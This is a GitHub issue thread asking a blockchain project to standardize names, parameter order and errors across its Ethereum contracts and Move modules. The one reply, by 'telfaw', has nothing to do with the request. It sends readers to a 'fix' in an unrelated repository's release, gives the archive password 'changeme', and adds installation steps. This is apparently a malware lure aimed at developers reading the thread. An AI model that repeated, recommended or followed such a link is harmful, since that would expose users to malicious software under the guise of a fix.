### ISSUE TITLE
Standardize ETH contracts and Move modules names, parameters and functions

### ISSUE THREAD

**Issue by 0xPrimata** [movementlabsxyz/movement#457]
**Is your feature request related to a problem? Please describe.**
For the sake of consistency and clarity, it's important to use the same name for every aspect of a stack be it on Ethereum or Movement. it's also important to expect the same order of parameters.

**Describe the solution you'd like**
1. initiator param => originator
2. lockBridgeTransferAssets => lockBridgeTransfer
3. reorder function parameters
4. Add named errors
5. remove copy from BridgeTransfers (sneaking this safety update in here)

**Describe alternatives you've considered**
not including param reordering

**Additional context**

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
